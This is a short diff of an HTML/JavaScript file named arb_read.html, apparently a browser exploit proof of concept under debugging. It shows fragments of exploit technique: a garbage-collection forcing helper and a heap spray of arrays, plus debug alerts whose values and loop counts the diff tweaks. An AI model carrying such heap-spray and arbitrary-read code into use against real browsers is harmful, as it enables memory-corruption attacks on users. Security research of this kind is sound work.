--- a/arb_read.html
+++ b/arb_read.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start with uint8 value:0xA61A");
+alert("start with uint8 value:0xA631A");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -53,7 +53,7 @@ try{
     alert(1)
     var spray = new Array(0x10);
     alert(2)
-    for (var i=0; i<spray.length; i++) {
+    for (var i=0; i<2; i++) {
         spray[i] = new Array(0x100);
     }
     alert('ok2');
